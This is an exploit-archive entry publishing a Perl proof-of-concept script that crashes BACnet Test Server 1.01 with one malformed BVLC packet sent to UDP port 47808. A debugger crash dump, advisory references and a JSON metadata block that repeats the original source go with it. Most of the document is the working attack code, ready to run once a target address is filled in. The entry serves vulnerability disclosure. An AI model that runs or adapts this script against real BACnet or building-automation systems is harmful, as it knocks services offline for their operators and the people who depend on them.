BACnet Test Server 1.01 - Remote Denial of Service Exploit
2020-10-07T00:00:00
ID 1337DAY-ID-35011 Type zdt Reporter LiquidWorm Modified 2020-10-07T00:00:00
Description
# Title: BACnet Test Server 1.01 - Remote Denial of Service (PoC)
# Author: LiquidWorm
# Vendor: https://www.bac-test.com
# Product link: https://sourceforge.com/projects/bacnetserver
# CVE: N/A
#!/usr/bin/perl
#
# BACnet Test Server 1.01 Remote Denial of Service Exploit
#
#
# Vendor: BACnet Interoperability Test Services, Inc.
# Product web page: https://www.bac-test.com
# https://sourceforge.com/projects/bacnetserver
# Affected version: 1.01 (BACnet Stack Version 0.5.7)
#
# Summary: This is a simple BACnet Server aimed at developers who
# want to explore or test their BACnet Client implementations of
# the ASHRAE BACnet protocol. It is based on Steve Karg's fine
# implementation of the BACnet Stack.
#
# Desc: The BACnet Test Server is vulnerable to denial of service
# (DoS): a UDP packet with a malformed BVLC Length field sent to
# port 47808 causes the application to crash.
#
# Type - 0x81
# BVLC Function
# - 0x01 - Write Broadcast Distribution Table
# - 0x02 - Read Broadcast Distribution Table
# - 0x03 - Read Broadcast Distribution Table ACK
# - 0x04 - Forwarded NPDU with optional Originating Device IP address and Port included in BVLL header
# - 0x05 - Register Foreign Device with expiration timeout (Time-to-live) in seconds
# - 0x0a - Original-Unicast-NPDU used to send directed NPDUs to another BACnet/IP device or router.
# Optional Originating Device IP address and Port NOT included in BVLL header.
# - 0x0b - Original-Broadcast-NPDU used by devices (except foreign devices) to broadcast messages on B/IP networks.
# - 0x0c - Secure-BVLL
# - BVLL Length
# - IP address of Originating Device - optional depending on BVLC Function Code
# - Port number of Originating Device - optional depending on BVLC Function Code
# - NPDU - Network Layer Protocol Data Unit
#
# =================================================================
# (67c.2f34): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** WARNING: Unable to verify checksum for C:\Program Files (x86)\BACnet Interoperability Testing Services, Inc\BACnet Server\Server.exe
# eax=00600000 ebx=00692000 ecx=009bd796 edx=005fee00 esi=005fec04 edi=005fed00
# eip=00994313 esp=005fec04 ebp=005fed00 iopl=0 nv up ei pl nz ac pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
# Server+0x34313:
# 00994313 8810 mov byte ptr [eax],dl ds:002b:00600000=??
# 0:000> d 994313 +77
# 0099438a cccccccc
# 0099438e cccccccc
# 00994392 cccccccc
# 00994396 cccccccc
# 0099439a cccccccc
# 0:000> d esp
# 005fec04 005ff3f8
# 005fec08 005ff408
# 005fec0c 00692000
# 005fec10 cccccccc
# 005fec14 cccccccc
# 004fec18 cccccccc
# =================================================================
#
# Tested on: Microsoft Windows 10 Professional (EN)
# Microsoft Windows 7 Professional SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5597
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5597.php
#
#
# 05.08.2019
#
use strict;
use warnings;
use IO::Socket::INET;
# Proof-of-concept parameters.  The target address is hard-coded by the
# author; 47808 (0xBAC0) is the port named in the description above.
my $target  = "10.0.99.34";
my $porta   = 47808;
my $proto   = "udp";
my $stype   = SOCK_DGRAM;
my $timeout = 1;

# Socket options gathered in one place.  For a datagram socket "connect"
# only fixes the peer address; nothing is transmitted until send().
my %sock_opt = (
    PeerHost => $target,
    PeerPort => $porta,
    Proto    => $proto,
    Type     => $stype,
    Timeout  => $timeout,
);

# Direct method-call form instead of the indirect-object `new Class (...)`
# syntax, which modern Perl style (and perlcritic) advises against.
my $socket = IO::Socket::INET->new(%sock_opt)
    or die "Socket error. : $!\n";

print "Connected to: $target:$porta\n";

$| = 1;            # unbuffered STDOUT from this point on
binmode $socket;   # raw bytes, no I/O layer translation

# The payload is a bare 4-byte BVLC header: type 0x81 (BACnet/IP),
# function 0x09, and a declared length of 0xFFFE.  The declared length is
# far larger than the datagram that actually carries it; that mismatch is
# the "malformed BVLC Length" condition named in the header comment, and
# it is also the property a network monitor or input validator can check
# (declared BVLC length vs. real UDP payload length).
my $data = "\x81\x09\xFF\xFE";

printf "Sending: %s [ %d bytes ]\n", $data, length $data;

# send() returns the number of bytes written (false on failure), so the
# `or die` fires only when nothing was sent.
send($socket, $data, 0) or die "Nope: $!\n";
print "Done.\n";

$socket->close();
{"id": "1337DAY-ID-35011", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "BACnet Test Server 1.01 - Remote Denial of Service Exploit", "description": "", "published": "2020-10-07T00:00:00", "modified": "2020-10-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/35011", "reporter": "LiquidWorm", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-12-27T13:47:36", "viewCount": 1, "enchantments": {"dependencies": {}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "zeroscience", "idList": ["ZSL-2020-5597"]}]}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://0day.today/exploit/35011", "sourceData": "# Title: BACnet Test Server 1.01 - Remote Denial of Service (PoC)\n# Author: LiquidWorm\n# Vendor: https://www.bac-test.com\n# Product link: https://sourceforge.com/projects/bacnetserver\n# CVE: N/A\n\n\n#!/usr/bin/perl\n#\n# BACnet Test Server 1.01 Remote Denial of Service Exploit\n#\n# \n# Vendor: BACnet Interoperability Test Services, Inc.\n# Product web page: https://www.bac-test.com\n# https://sourceforge.com/projects/bacnetserver\n# Affected version: 1.01 (BACnet Stack Version 0.5.7)\n#\n# Summary: This is a simple BACnet Server aimed at developers who\n# want to explore or test their BACnet Client implementations of\n# the ASHRAE BACnet protocol. 
It is based on Steve Karg's fine\n# implementation of the BACnet Stack.\n#\n# Desc: The BACNet Test Server is vulnerable to a denial of service\n# (DoS) vulnerability when sending malformed BVLC Length UDP packet\n# to port 47808 causing the application to crash.\n#\n# Type - 0x81\n# BVLC Function\n# - 0x01 - Write Broadcast Distribution Table\n# - 0x02 - Read Broadcast Distribution Table\n# - 0x03 - Read Broadcast Distribution Table ACK\n# - 0x04 - Forwarded NPDU with optional Originating Device IP address and Port included in BVLL header\n# - 0x05 - Register Foreign Device with expiration timeout (Time-to-live) in seconds\n# - 0x0a - Original-Unicast-NPDU used to send directed NPDUs to another BACnet/IP device or router.\n# Optional Originating Device IP address and Port NOT included in BVLL header.\n# - 0x0b - Original-Broadcast-NPDU used by devices (except foreign devices) to broadcast messages on B/IP networks.\n# - 0x0c - Secure-BVLL\n# - BVLL Length\n# - IP address of Originating Device - optional depending on BVLC Function Code\n# - Port number of Originating Device - optional depending on BVLC Function Code\n# - NPDU - Network Layer Protocol Data Unit\n#\n# =================================================================\n# (67c.2f34): Access violation - code c0000005 (first chance)\n# First chance exceptions are reported before any exception handling.\n# This exception may be expected and handled.\n# *** WARNING: Unable to verify checksum for C:\\Program Files (x86)\\BACnet Interoperability Testing Services, Inc\\BACnet Server\\Server.exe\n# eax=00600000 ebx=00692000 ecx=009bd796 edx=005fee00 esi=005fec04 edi=005fed00\n# eip=00994313 esp=005fec04 ebp=005fed00 iopl=0 nv up ei pl nz ac pe nc\n# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216\n# Server+0x34313:\n# 00994313 8810 mov byte ptr [eax],dl ds:002b:00600000=?? 
\n# 0:000> d 994313 +77\n# 0099438a cccccccc\n# 0099438e cccccccc\n# 00994392 cccccccc\n# 00994396 cccccccc\n# 0099439a cccccccc\n# 0:000> d esp\n# 005fec04 005ff3f8\n# 005fec08 005ff408\n# 005fec0c 00692000\n# 005fec10 cccccccc\n# 005fec14 cccccccc\n# 004fec18 cccccccc\n# =================================================================\n#\n# Tested on: Microsoft Windows 10 Professional (EN)\n# Microsoft Windows 7 Professional SP1 (EN)\n#\n#\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\n# @zeroscience\n#\n#\n# Advisory ID: ZSL-2020-5597\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5597.php\n#\n#\n# 05.08.2019\n#\n\nuse strict;\nuse warnings;\nuse IO::Socket::INET;\n\nmy $target = \"10.0.99.34\";\nmy $porta = 47808;\nmy $proto = \"udp\";\nmy $stype = SOCK_DGRAM;\nmy $timeout = 1;\n\nmy $socket = new IO::Socket::INET (\nPeerHost => $target,\nPeerPort => $porta,\nProto => $proto,\nType => $stype,\nTimeout => $timeout\n) or die \"Socket error. : $!\\n\";\n\nprint \"Connected to: $target:$porta\\n\";\n\n$| = 1;\nbinmode $socket;\n\nmy $data = \"\\x81\\x09\\xFF\\xFE\";\n\nprint \"Sending: $data [ \".length($data).\" bytes ]\\n\";\nsend ($socket, $data, 0) or die \"Nope: $!\\n\";\nprint \"Done.\\n\";\n\n$socket->close();\n", "category": "dos / poc", "verified": true, "_state": {"dependencies": 1647589307, "score": 0}}